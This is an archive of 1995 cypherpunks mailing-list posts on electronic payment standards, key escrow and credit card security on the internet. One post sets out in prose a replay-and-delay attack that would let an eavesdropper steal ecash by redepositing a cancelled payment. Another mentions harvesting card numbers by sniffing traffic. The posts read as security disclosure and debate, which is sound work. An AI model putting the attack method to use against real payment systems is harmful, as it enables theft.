From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 4 Dec 95 12:14:04 PST
To: rsalz@osf.org (Rich Salz)
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
In-Reply-To: <9512041705.AA25255@sulphur.osf.org>
Message-ID: <199512042005.MAA04678@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	It doesn't appear that these people seem to care about
cash-like anonymous token-based payment schemes. Is that a valid
assesment? What is needed to make these people start caring about
that?

> 
> ---------- Begin Forwarded Message ----------
> Date: Fri, 1 Dec 1995 22:43:46 -0500 (EST)
> From: "Debbie O'Dell" <dlo@dsunix2.dsrd.ornl.gov>
> To: Electronic Commerce Working Group Reflector <fstc-ecomm@monroe.llnl.gov>
> Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Standard

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 4 Dec 95 09:07:51 PST
To: cypherpunks@toad.com
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment Standard
Message-ID: <9512041705.AA25255@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


---------- Begin Forwarded Message ----------
Date: Fri, 1 Dec 1995 22:43:46 -0500 (EST)
From: "Debbie O'Dell" <dlo@dsunix2.dsrd.ornl.gov>
To: Electronic Commerce Working Group Reflector <fstc-ecomm@monroe.llnl.gov>
Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Standard

ABA Meeting of the X.9 ANSI Meeting 11/29/95, on Electronic Payments:
Cindy Katzen (?) gave an introduction.  She said that the ANSI X.9 which is
accredited to develop financial industry standards, has approved this work
item on Electronic Payments.  X.9 has 6 subcommittees, 30 active working
groups, and manage 70 standards, and technical specifications.  We do 5 year
reviews on each.  Also they are the US technical advisory group to ISO
Technical Committee 68 (TC68), and they also provide a secretariat.  TC68
has 3 subcommittees.  Mark Zalewski of Cybercash is nominated chair for TC68.

This is domestic standards development.  Define work and tell them what
needs to be done.  If there does not need to be a domestic standard but an
international one that is okay.  Intel has offered to provide a Chairperson,
Tom Jones.

Tom lead the meeting with the following agenda:
Scope of work item
Proposal to extend the work item into other areas
2 presentations on other standards, Taher Elgamal on SEPP, and FSTC on Echeck

The general purpose of this work item is to produce an American national
standard on secure electronic payment syntax.  Since the group is large, Tom
suggested nominating a small editing group of 6-10 people to put together a
document and bring it back to the larger group.

Tom said that he wanted to get through the work item in 18 months, and to do
that there would have to be a draft in 9 months.  The following document was
a strawman distributed to start discussion on a proposed X9 new work item.

"Towards an American National Standard:  Secure Payment Syntax
Scope:
The payment syntax described in this standard is designed to order a
Financial Institution to make a payment to a merchant from an account of a
purchaser based on the near term delivery of low monetary  value goods or
services.  It should be possible to include this payment order in any
electronic protocol that is based on communications between the purchaser
and the merchant, and between the merchant and a Financial Institution.
This standard does not describe, nor recommend, any particular communication
protocol.

When used within a complete payment infrastructure, the secure payment order
described below shall offer privacy and integrity of the purchaser's payment
information, and shall prevent the purchaser from successfully repudiating
the sending, or the merchant from successfully repudiating the receiving, of
a valid payment order.  Non-repudiation of receipt will require secure
acknowledgment messages.  Thus the Financial Institution can be sure that
its customer requested the payment and that the merchant can be accurately
identified on the account statement.

Purpose:
Consumers, operating from within their own home or business, have access to
an increasingly wide range of electronic displays of merchant's wares.  The
source of this electronic cornucopia can be provided by networked
connections, broadcast or narrowcast TV, the physical distribution of
electronic media, such as CD-ROM, or future media connections which are now
only in the conceptual stage.  Regardless of the source of the information,
there is an increasingly urgent demand that user's make the purchase
decision directly from the electronic media, and the purchase decision be
transmitted together with payment information to the merchant.  The merchant
wants to receive the payment information prior to delivering the merchandise
to cut down on fraud loss and the purchaser seems to want immediate access
to the goods or services, purchased.

This standard is intended to close the electronic loop by providing a secure
means for the purchaser to make payment information available to the
merchant, without revealing any secret information that could be used in a
fraudulent manner to access the purchaser's accounts.  The payment
information will only be accessible by the purchaser, and the purchaser's
Financial Institution, but the merchant can be assured, in real-time, that
payment will be honored by his Financial Institution.

Content of the Payment Order:
The fields required for the payment order are separated into the plain text
segment and enciphered segment.

Transparent fields from CyberCash Credit Card Protocol (CH1)
  type: card-payment
  id
  order-id
  merchant-ccid
  transaction
  date
  pr-hash
  pr-signed-has
  cyberkey

EPO fields from "NetBill Security and Transaction Protocol"
  purchaser's ID
  Product ID
  Negotiated Price
  Merchant ID
  Crypto Checksum of Product Request Data
  Crypto Checksum of Purchaser's Account No with a nonce
  Globally-unique EPOID (Transaction ID)

Security for the Payment Order (from the Purchaser)
Only those fields that are in the enciphered segment will be protected from
disclosure or alteration by cryptographic means.

Opaque fields from CyberCash Credit Card Protocol (CH1)
  swversion
  amount&currency
  card (expiry, number, type, salt) - must be pre-approved
  signature

EPO fields from "NetBill Security and Transaction Protocol"
  Ticket proving the customer's TRUE ID
  Authorization Tokens
  Purchaser's Account No
  nonce
  Purchaser's memo field

Security for Merchant Fields
Those fields that are in the merchant's enciphered segment will be protected
from disclosure or alteration by cryptographic means.

Merchant Opaque fields from CyberCash Credit Card Protocol (CM1/2)
  type
  order-id
  merchant-amount&currency
  pr-hash
  pr-signed-hash
  id
  transaction
  date
  merchant-signature

EPO fields from "NetBill Security and Transaction Protocol" added by merchant
  Merchant's account number
  Merchant's memo field
  Goods decryption key
  Merchant signature
"

Discussion on scope:

The result of this group will be a message set and sequence diagram.  There
will be a lot of work going into what is in those messages.

There was some discussion about the use of the terms low monetary value and
merchant.

Graham asked if other payment flows would be considered.  Tom said that he
wanted to have a scope that is small and easily achievable, so that is why
we are focusing the flow from consumer to merchant to financial institution.

Right now this cannot support cash, as it requires the consumer to have a
bank account.  It can support credit or debit.

There are a relatively small group of encryption algorithms about to be
approved by X-9.

Three have been approved:   DES,  Triple DES is in the works, RSA and
Vhelman (?).  Digital Signature and Secure Hash is a standard; attribute
lists are being worked on.  Security folks in X9f will be active in this
work item.

It may be necessary to specify encryption schemes.  Key exchange is quite
different.  If you allow more than one, you get into interoperability
problems.

NSA representative said that the length of the encryption key should not be
an issue, but what is encrypted should be of more concern for the group.
The group should not limit this standard based on a regulation that could
change in a few months.

The 820 is complicated and could be used to accomplish this activity, but
this work item is trying to come up with a relatively simple consumer
oriented transaction.

If you are going to say privacy, integrity and non-repudiation, then you
will have to define cryptography.  X.9 has standards that define the
cryptography protocols so we can reference them.

The comments on the scope will be incorporated and a new draft will be
submitted to the group for review.

Will the usage specification operate with current regulation and clearing
and settlement system?

If you use Party A, Party B and a Bank, instead of using the term merchant,
then you could move it in any way.  If there are 2 parties and only one
bank, then this will not effect any clearing system.  If it is 2 parties and
2 banks then the clearing system comes into play.

Should the second bank be added to the scope?  Do we want to support flows
between financial institutions.

We need to rely on the banks to tell us if this is  implementable.  Dan
suggested that the standard be expanded to support information exchanged
between banks.

Tom said that we should work to understood the needs of customers and limit
ourselves to the problems that we know and not try and solve problems we
don't know about.

We can produce guidelines for reference implementations, but they are not
part of the standard.  We encourage organizations that are developing
implementations to advise us of any issues in implementing the standard.

Tom said that he will do best to narrow the scope.  If any suggestion
increases the scope significantly, I will recommend that they become a
separate work item.

Talk on SEPP:  John Gould of MasterCard said that the Secure Electronic
Payment Protocol (SEPP) is intended to solve MC's business model.  We expect
to conclude revision to the SEPP review process in less than 60 days.  We
have a time pressure by customers and member banks to secure our brand
products quickly.  We will be piloting the result hopefully with VISA and
X9.  Take the SEPP document as an informational, living, document.  We will
not know how good it is until we start to pilot it.

Taher Elgamal, of Netscape, said that SEPP is a vertical solution rather
than a horizontal message format.  SEPP solves the credit card transaction
where there is a consumer, merchant and merchant's bank.  We were not trying
to solve the world's payment problems.  Credit cards are the simplest model
to use.  People feel comfortable because the liability is to the benefit of
the consumer most of the time.  We tried to minimize the impact on the
existing medium, banking protocols and networks.  The design is a front end
to the existing bank network.

We had to solve the authentication problem.  It is not really exactly known
how this will work and if it will scale properly.  We tried not to change
relationship between parties.  We started with a generic philosophy to use
standards where they exist.

SEPP will be implemented independently by different vendors that have to
achieve interoperability.  The merchant does not have to see the credit card
number even though he does today.  The payment/order has dual encryption.
The payment instruction is opaque to the merchant.  The order details are
not of interest to the bank.

The message formats are the tools in SEPP, to achieve the product, that is
useful.  There is an attempt to solve the grand picture.  The credit card
system is complex.

Does the merchant really need to know the identity of the consumer.  The
merchant is only interested that the person is capable of using the amount.
They may want to know, but they may not need to know.

We built in an online certification system, which certifies consumers and
merchants.   For SEPP, the acquiring bank does the certification.  Dan
mentioned that this is not quite analogous to how it works in the paper model.

Frank Jaffe spoke about Echeck.
He said that the future is likely to bring more alternatives, not less.  We
wanted to move the check to a paperless instrument.  Eliminate paper and use
cryptographic methods to secure it.  We're looking at digital signatures to
replace hand signatures.
The Electronic Check supports multiple check flows.  Deposit and Clear
(Normal) flow, Cash Check, Z flow, Lockbox flow, and transfer flow.
Electronic Check supports multiple business models:  Certified Check flow,
Interchange, Third Party Payer.
Overview:
-Develop a secure, all-electronic instrument modeled on paper check
primarily for use in electronic commerce
-Enable this instrument to be flexible and represent other physical
instruments such as cashier's checks, traveler's checks
-Develop a general programmatic set of tools and standard interfaces,
protocols and formats so that E-Check functions can be used for other
applications.
-Test approach through a commercial pilot.

We would like to develop a reference implementation and tools to make it
easier to use it.

Electronic Check objectives:
-provide individuals and businesses a safe convenient debit payment option
-use inexpensive public networks
-enable merchants to automate complete transactions

 We're not trying to specify encryption, to allow parties to use what they
want.

Key component summary:
-hardware token for electronic and checkbook cryptographic key storage
-digital signatures for transaction authentication
-electronic certificates for account and bank authentication
-secure hash for tamper-proofing
-encryption for privacy is optional
-remittance/invoice/order form included for automated accounts receivable
processes
-public networks for transmission

The scope of the project is to issue payment orders against accounts in banks.
If customer wants it, banks can afford it, and it can be done securely than
why not?

Tom started discussion again on the X.9 Work item.  He said that we need to
address: what do customers want, what risks do banks want to take and how
fast do you want to do it?

The banking industry needs a protocol standard for electronic  payments.
This could be the beginning of something bigger; define a scope for this
work item, but as the beginning of a payment protocol.

Frank suggested that the project should focus more than just consumer to
merchant.

Several people suggested trying to develop a more encompassing payment
protocol than just consumer to merchant payments, because it is easier to
design up front than redesign after it has been implemented.

Others suggested that we ought to start with something manageable, like
debit or credit cards, but not design ourselves into a corner.

If this group does not address payment types, than client software will have
to identify between payment types and what merchants and/or banks take what.

Taher pointed out that SEPP will not do debit cards well.

Will consumers use account based systems in the volume that you expect?

Many agreed that speed is important, and encouraged staying focused for time
considerations.

There was a suggestion to have separate groups developing payment syntax for
credit, debit, echeck.

One suggestion was to help the consumer to quickly negotiate a payment
system of choice.

Spending time on credit seems to make sense since it is more widely used on
the Internet.

NACHA is addressing the check issue.

Tom summarized the discussion saying that it appeared that most agreed to
stay cognizant of all issues, but focus on the credit model and allow the
architecture to expand.

We should find what is in common to all payment systems.  Make it modular to
add on types or variations.
Someone suggested a steering committee to address these extensions.

Tom proposed an editing group of 6-10 people to get document out on the
credit model.  He proposed having a meeting of the editing group on January
16th in San Francisco.

The full group will meet Feb. 29th at Cylink in Sunnyvale.
and tentatively June 7th in Boston at the Fed.

However other groups would like to deal with the other issues is up to them.

FSTC will find a way to work with this committee through their joint
membership.

Tom asked Frank to feed back to X9 how FSTC wants to fit Echeck into this
work group.

All this work item was written to deal with is the syntax, we are not going
to deal with the protocol.   There would be a multiplicity of protocols that
would use it, phone, modem, http.

SEPP has an application protocol that is independent of communications.

Mohammad Khan volunteered to lead a group to discuss management issues
including negotiation.  VISA, MC, Discover, IBM, and Cybercash volunteered
to participate in that group.
----------- End Forwarded Message -----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 4 Dec 95 09:05:20 PST
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in the Americas ?
In-Reply-To: <Pine.BSD.3.91.951204003918.13763D-100000@ahcbsd1.ovnet.com>
Message-ID: <199512041705.MAA07611@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James M. Cobb" writes:
> Friend, 
>  

Enemy,

Please stop this neverending stream of oddly formatted and irrelevant
messages...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 4 Dec 95 10:10:48 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <199512022116.NAA11199@jobe.shell.portal.com>
Message-ID: <199512041809.NAA24040@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>Changing the market conventions (say, by introducing escrow agencies)
>will change the weightings of the various factors that make up
>utility.  If I no longer have to trust the honesty of the person I am
>trading with (because we have an escrow agency to help us make the
>exchange) then the importance of his reputation for honesty goes down.
>The result is that the "reputation" curves will change rather
>dynamically and unpredictably as we consider different possible
>structures in the market.  This will make the analysis of them
>intractable, I would think.

Analytically, using an escrow agent doesn't change the utility
function.  It replaces the trading partner's honesty reputation
estimate with the escrow agent's (which is presumably higher, or why
use them?).  This is just a parameter substitution.

Whence comes the intractability?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Mon, 4 Dec 95 09:14:57 PST
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: RE: key escrow compromise
Message-ID: <30C3575F@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



Quoting: "Vladimir Z. Nuri" <vznuri@netcom.com>
>I tend to agree with Clark in only one regard: the government is going
>to get into the key storage/retrieval business in some form or another
>eventually & inevitably; it's just not stoppable.

Well, I would tend to disagree.  If PGP weren't out, you might conceivably
have a point.  Given that it is out, are you suggesting that the NSA would
be able to make all copies of it go away?  And all copies of PEM?
And everyone else's encrypted Email programs including all those
available from many other countries?  Shutting down the Internet
completely wouldn't be a sufficient measure to make that happen.

>the aspect
>that is up for grabs is whether these systems will be *mandatory* for
>all private communication.

I remember some clear statements that this is the goal, as should be
obvious, since any smaller goal doesn't make any sense.

>here's a quick idea. the post office is getting into
>certification authorization come hell or high water (ETA summer, 96).
>now, frankly I think this is a good thing. someday we will need some kind
>of legal agency to deal with citizen keys, so that we could have
>cryptographic dealings with federal agencies such as the motor
>vehicles department, etc.

Well, I don't know why a government agency that calls itself a 
non-government
agency one minute and hides underneath special government
monopoly privileges should be given yet another special
privilege, but anyway... yes, clearly at some point we will need
certification that will make digital signatures useable.

However, that has NO connection with GAK, and in fact is a strong
argument against it.  If the government has access to my keys, then
why should anyone trust my signature?  Conversely, certification
for digital signatures involves making statements about the validity
of PUBLIC keys, and imposes NO requirement on private keys.

     paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 4 Dec 95 10:22:34 PST
To: OpsAn@gnn.com (Michael Coates)
Subject: Re: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
Message-ID: <9512041821.AA00569@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  "If someone wanted to steal a credit card number, all they would
>  have to do is go to any gas station and look on the ground around
>  the pumps," says the CTO at Internet security firm Terisa Systems.

Sure, if you wanted to steal a card number or two the ground around a  
gas-station would probably be a good choice.  However, if you wanted to steal  
a thousand card numbers (or maybe even thirty thousand), just sniff packets  
off a hub near a large Web site that accepts unencrypted (or weakly  
encrypted) card transactions or hack your favorite ISP's machines.

It really bothers me that officers at companies writing net commerce software  
are regularly quoted in the trade rags comparing the relatively little risk  
of a single net card transaction vs. a transaction at a restaraunt or gas  
station.  We aren't talking about a crooked clerk who handles at most a few  
hundred cards per day or an unlocked dumpster with maybe the same number of  
carbons in it.  We are talking about potentially hundreds of thousands of  
card numbers whizzing through a single point that could be easily (and  
undetectably) monitored and recorded with off-the-shelf-equipment for later  
analysis.  Even if the transactions are encrypted, a single exploitable  
weakness discovered after widespread deployment could compromise massive  
numbers of cards.  The stakes are much higher and this will invite much more  
sophisticated crooks to attempt to defraud the system.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Mon, 4 Dec 95 10:20:45 PST
To: "'cypherpunks@toad.com>
Subject: RE: GAK_hit
Message-ID: <01BAC24B.759D78A0@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


James Donald wrote:

>At 09:25 AM 12/4/95 -0500, John Young wrote:
>>   12-4-95. W$Jabber:
>>
>>   "Microsoft Probe Spurs Subpoenas Tied to Internet.
>>   Antitrust Effort Appears Focused on Windows 95 Disabled
>>   Rival Software."
>
>>      The subpoena issued to Netscape may be of particular
>>      significance. In the estimate of Netscape and industry
>>      observers,
>
>I regularly use netscape on windows 95, and I conclude that 
>this subpoena is pure, 100% harassment.

What does that mean? I interpret it to mean only
that Netscape is being asked to testify _against_
MS. I've been using Win95 along with at least half
a dozen different browsers (including about the same
number of different Netscape versions), and never 
had any compatibility problems switching.

Most recently I was running IBM Explorer 2.0 until the
other day when I "upgraded" to the latest beta of
Navigator--at which point Explorer stopped being
my default browser. Navigator never asked if I wanted
to make it the default, but now all my .htm and .html
files have that Navigator look. As soon as this project
is done, I'm switching back to Explorer, thank you.

-Pete Loshin
 pete@loshin.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Mon, 4 Dec 95 11:30:15 PST
To: cypherpunks@toad.com
Subject: [POINTER:] Crypto Articles in Dr. Jobbs Journal
Message-ID: <9512041930.AA14103@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



For non Dr. Jobbs subscribers:

Dr. Jobbs Journal has several articles on encryption,
including an article by Ian and Dave on the Netscape crack, multiple 
encryption, and using MD5 for passwords.

Also, there is a very interesting article by the author of Applied
Cryptography (the Big Mac himself), looking at differential and linear
cryptoanalysis of the DES algorithm.

There are also some compression articles as well.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Mon, 4 Dec 95 11:09:11 PST
To: cypherpunks@toad.com
Subject: How to steal ecash (was: Questions/Comments on ecash protocol)
In-Reply-To: <199512012222.OAA18230@netcom14.netcom.com>
Message-ID: <49vgvh$i7a@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199512030127.RAA03496@cory.EECS.Berkeley.EDU>,
Ian Goldberg  <iang@cory.EECS.Berkeley.EDU> wrote:
>Since the payer_code is not supposed to be sent around, how is it sent to
>the bank in order to cancel a payment?  The document says "This allows him
>to cancel the payment (deposit in his account)...", which seems to indicate
>that a cancellation is just a deposit (made out to someone else), accompanied
>by an appropriate payer_code.  It is important that an eavesdropper not
>be able to ever see the payer_code that corresponds to a payment, or
>else she could present both to the bank and say "cancel this payment",
>and get the money "back".

After reading the responses to my questions/comments, it seems that, if
Charlie (the customer) wants to cancel a payment, his ecash client sends
a copy of the payment, including the payer_code field (which evidently was
not in the original payment), to the mint.  The mint accepts the payment
because the payer_code was supplied.  However, the payer_code is sent
_in the clear_.

Thus: How to steal ecash:

This method can be used by Mitch, an active eavesdropper, though all he really
needs to be able to do is selectively remove or delay packets in transit.

Mitch taps either his target, or, better yet, the mint, and watches for
deposits to the mint that have the payer_code filled in (a cancelled payment).
He delays that packet, and sends the identical deposit to the mint himself
(with his own userID in the userhdr, of course).  The mint, being unable
to know who withdrew the coin originally, has no reason to believe it wasn't
Mitch, and so happily deposits the money "back" in Mitch's account.
Mitch is then free to release the delay on the original packet, and
Charlie's deposit fails (as the coin has already been deposited).

So:  do I win
anything?   :-)

Disclaimer: Don't do this.  Then again, is it illegal to copy ecash?  I doubt
  it's considered counterfeiting.  What about creating ecash out of thin air
  (say I had a magic factoring box (like a quantum computer (well, not yet)))?

   - Ian "IANAL, but IAA security-wise net.citizen..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 4 Dec 95 12:07:53 PST
To: cypherpunks@toad.com
Subject: Re: key escrow compromise
In-Reply-To: <30C3575F@mailer2>
Message-ID: <199512042009.OAA04796@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


>I tend to agree with Clark in only one regard: the government is going
>to get into the key storage/retrieval business in some form or another
>eventually & inevitably; it's just not stoppable.

I don't understand this attitude at all.

There is no constituency for GAK except for law enforcement.  Everyone 
else hates it.  There isn't any legal or constitutional basis for 
believing that GAK is unstoppable.

The more information people have about GAK the less likely it becomes, 
and more and more people find out about it every day.

Perhaps believing our opponents have unlimited power and influence adds 
to the romance of what we're doing here.  But it's not true.

This is winnable.  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 4 Dec 95 12:26:45 PST
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
In-Reply-To: <9512041821.AA00569@ch1d157nwk>
Message-ID: <199512042026.PAA03718@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Loewenstern writes:
>>  "If someone wanted to steal a credit card number, all they would
>>  have to do is go to any gas station and look on the ground around
>>  the pumps," says the CTO at Internet security firm Terisa Systems.
>
>Sure, if you wanted to steal a card number or two the ground around a  
>gas-station would probably be a good choice.  However, if you wanted to steal 
>a thousand card numbers (or maybe even thirty thousand), just sniff packets  
>off a hub near a large Web site that accepts unencrypted (or weakly  
>encrypted) card transactions or hack your favorite ISP's machines.

Duh.  The point of the article the original poster quoted was that
there's little risk to individual *consumers*.  If someone sniffs
thirty thousand credit cards from a poorly secured web-site, the
consumers are still only liable for $50.  Of course, the card company
gets a big bill, and probably will try to sue the site to recover, and
both will pass those costs back to the consumer, assuming they
survive.  The total cost is still pretty small to the individual.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 4 Dec 95 14:46:54 PST
To: rsalz@osf.org (Rich Salz)
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
In-Reply-To: <9512042126.AA25932@sulphur.osf.org>
Message-ID: <199512042241.OAA22114@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	As Andrew conveniently pointed out, it doesn't seem that
cybercash suits my purposes very well. I'll contact the addresses
below, and will inform the list of my results. Thanks.

> 
> > 	It doesn't appear that these people seem to care about
> > cash-like anonymous token-based payment schemes. Is that a valid
> > assesment? What is needed to make these people start caring about
> > that?
> 
> I didn't go to the meeting.  On the other hand, I notice Cybercash people
> in influential positions on the comittee.  I'd also contact
> > > From: "Debbie O'Dell" <dlo@dsunix2.dsrd.ornl.gov>
> > > To: Electronic Commerce Working Group Reflector <fstc-ecomm@monroe.llnl.gov>
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Mon, 4 Dec 95 12:46:38 PST
To: turner@TeleCheck.com
Subject: Re: [POINTER:] Crypto Articles in Dr. Jobbs Journal
In-Reply-To: <9512041930.AA14103@mercury.telecheck.com>
Message-ID: <9512042047.AA30008@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the brain fart.  I've been up without sleep for a very long
time...  Ever since I attempted to attend the Austin CP meeting which
didn't take place, then I was in Dallas most of yesterday and last night.

I am running on nicotine, caphine, and....  Its *Dr. Dobbs 
Journal.*  Appologies to the publishers and for those who are sending
me corrections...

> 
> For non Dr. Jobbs subscribers:
> 
> Dr. Jobbs Journal has several articles on encryption,
> including an article by Ian and Dave on the Netscape crack, multiple 
> encryption, and using MD5 for passwords.
> 
> Also, there is a very interesting article by the author of Applied
> Cryptography (the Big Mac himself), looking at differential and linear
> cryptoanalysis of the DES algorithm.
> 
> There are also some compression articles as well.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 4 Dec 95 12:52:02 PST
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN
Message-ID: <9512042051.AA00620@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
>  Of course, the card company gets a big bill, and probably will try
>  to sue the site to recover, and both will pass those costs back to
                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>  the consumer, assuming they survive.  The total cost is still pretty
   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>  small to the individual.

You just said it right there.  The cost doesn't go away.  Just because  
individual credit card holders each only have to pay for a small fraction of  
the fraud pie doesn't make it right for executives to be saying that it is  
safe.  Any more than it is right for cellular companies to completely ignore  
security concerns because "the total cost is still pretty small to the  
individual."

The point is that these costs, no matter how small at the individual  
cardholder level, are avoidable.  Why should consumers have to pay for fraud  
that can be prevented?  By ignoring security concerns, encouraging people to  
use card numbers in an unsafe manner, and then passing the fraud burden onto  
the individual customers, card issuers will basically be stealing money from  
the consumers much in the same way that cellular telcos have been doing for  
years.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 4 Dec 95 12:18:28 PST
To: turner@TeleCheck.com
Subject: Re: [POINTER:] Crypto Articles in Dr. Jobbs Journal
In-Reply-To: <9512041930.AA14103@mercury.telecheck.com>
Message-ID: <Pine.3.89.9512041547.A23889-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


You mean Dr. Dobb's Journal.
             ^
You can look for sources at <http://www.ddj.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 4 Dec 95 12:29:59 PST
To: cypherpunks@toad.com
Subject: Commercial Apachessl
Message-ID: <Pine.3.89.9512041530.B23889-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Hi Sameer.

You mentioned the server won't be commercially free for licensing reasons?
(erased that post, darn) The RSA ones? Would it be free for commercial
purposes in Canada? (Are the problems restricted to RSA or also RC4?)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 4 Dec 95 16:13:01 PST
To: cypherpunks@toad.com
Subject: Netscape and Jim Clark
Message-ID: <199512050004.QAA07307@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim must have done something wrong today, he only made $120,000,000...

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Mon, 4 Dec 95 14:08:10 PST
To: Rich Salz <rsalz@osf.org>
Subject: Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment
Message-ID: <9512042207.AA00653@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Sameer (sameer@c2.org) writes:
>  > 	It doesn't appear that these people seem to care about
>  > cash-like anonymous token-based payment schemes. Is that a valid
>  > assesment? What is needed to make these people start caring about
>  > that?
Rich (rsalz@osf.org) responds:
>  I didn't go to the meeting.  On the other hand, I notice Cybercash
>  people in influential positions on the comittee.

But "CyberCash" isn't cash...

DigiCash == THE company with digital cash technology
CyberCash == Yet Another Company with a Net Credit Card Payment System


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 4 Dec 95 13:23:41 PST
To: JR@ns.cnb.uam.es
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <951204173237.20a03d03@ROCK.CNB.UAM.ES>
Message-ID: <Pine.SUN.3.91.951204160720.14502A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Dec 1995 JR@ns.cnb.uam.es wrote:

> Black Unicorn <unicorn@polaris.mindport.net> wrote
> >On Fri, 1 Dec 1995 JR@ns.cnb.uam.es wrote:

> > 
> >Let's put this example in a more personal context, with you as the 
> >netscape guru.  In fact, let us carry that assumption along, as really 
> >I'm talking to the netscape insiders to begin with.
> 
> 	Please, not that I have no liaison to Netscape. But I don't like all
> this broohaha about whether this or that guy is evil because s/he does/
> doesn't hold with some principles/ends.
> 
> 	If one wants to be effective, one needs to understand the other
> side's point of view, so as to be able to develop coherent strategies that
> work.
> 
> 	Independently of what *my* personal convictions are -which I
> have never stated-, you can't forget that not everybody holds to your
> same ethics or needs to.

I'm afraid you have missed the point too.

I don't care as much what the personal positions are, or what the ethical 
center from which person x or person y works.

I am most distressed because of what I see as a snowjob.

"We are anti-GAK"

Great, tell me what you have done to prevent GAK from proliferating.

In the absence of an answer to that challenge, I have to question the 
first statement as fluff or PR.

This has nothing to do with Netscape sharing my opinion, or not sharing 
my view on the evil of GAK.  It has to do with putting up or shutting 
up.  I have been told that Netscape agrees with me, or will agree with 
me, I just don't know that I believe it yet.


> 
> ...
> >
> >Your faith in Joe Random vastly exceeds mine.
> 
> 	So it seems. Anyway, that's the only resource we have. If Joe
